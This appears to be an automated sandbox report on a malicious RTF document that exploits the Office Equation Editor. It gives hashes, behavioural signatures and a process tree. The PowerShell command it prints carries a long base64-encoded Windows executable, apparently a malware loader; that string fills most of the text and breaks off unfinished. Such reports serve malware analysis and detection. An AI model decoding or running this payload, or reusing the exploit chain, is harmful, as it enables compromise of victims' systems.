d9e3badb259072ad8fd55222b22196ee97b3e81a8cbc72bd8e75d786010a91e4

General

Target

SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.25049.19754.rtf
Size

166KB
MD5

d8aac2e906926936cb564f477a23661c
SHA1

73a54a91c74cab6667b0faa9dd9049a314e93a40
SHA256

d9e3badb259072ad8fd55222b22196ee97b3e81a8cbc72bd8e75d786010a91e4
SHA512

236a8c9228504111b3340e907f1f82c9b3262f5f70a6341435c2591838024fcba319c1be40c19cc9a12278e04b5f0f36d341f2bafc134fba7b6c76263084008a
SSDEEP

3072:o32iLRtiyoYvd+5x/1Zlk/oIHCC90p5+SK:+FEYvAf1ZIHLSK

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2848	EQNEDT32.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2848	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1800	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2812	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2812	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1800	WINWORD.EXE
1800	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 2816	2848	EQNEDT32.EXE	29
PID 2848 wrote to memory of 2816	2848	EQNEDT32.EXE	29
PID 2848 wrote to memory of 2816	2848	EQNEDT32.EXE	29
PID 2848 wrote to memory of 2816	2848	EQNEDT32.EXE	29
PID 2816 wrote to memory of 2812	2816	WScript.exe	31
PID 2816 wrote to memory of 2812	2816	WScript.exe	31
PID 2816 wrote to memory of 2812	2816	WScript.exe	31
PID 2816 wrote to memory of 2812	2816	WScript.exe	31
PID 1800 wrote to memory of 2336	1800	WINWORD.EXE	36
PID 1800 wrote to memory of 2336	1800	WINWORD.EXE	36
PID 1800 wrote to memory of 2336	1800	WINWORD.EXE	36
PID 1800 wrote to memory of 2336	1800	WINWORD.EXE	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.25049.19754.rtf"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2336

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\efcopjgu.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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KgDVAqMA2gIlANoCJQAMAwAAAAAASUVudW1lcmFibGVgMQBDb250ZXh0VmFsdWVgMQBUaHJlYWRTYWZlT2JqZWN0UHJvdmlkZXJgMQBrZXJuZWwzMgBNaWNyb3NvZnQuV2luMzIAVG9VSW50MzIAVG9JbnQzMgAyOWEwN2RmNDA4ODU0NGNkYWNmZWU3ODg4ZGQ2MjBmMgBUb0ludDE2AGdldF9VVEY4ADxNb2R1bGU+AExvYWRMaWJyYXJ5QQBCAEMARABFAEYAVkFJAFN5c3RlbS5JTwBRQlh0WABQcm9qZWN0RGF0YQBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQATG9hZABwYXlsb2FkAFN5bmNocm9uaXplZABOZXdHdWlkAFJlcGxhY2UAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUARW5kSW52b2tlAEJlZ2luSW52b2tlAEVudW1lcmFibGUAVGhyZWFkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFByb2Nlc3NIYW5kbGUAaGFuZGxlAEZpbGUAc2V0X1d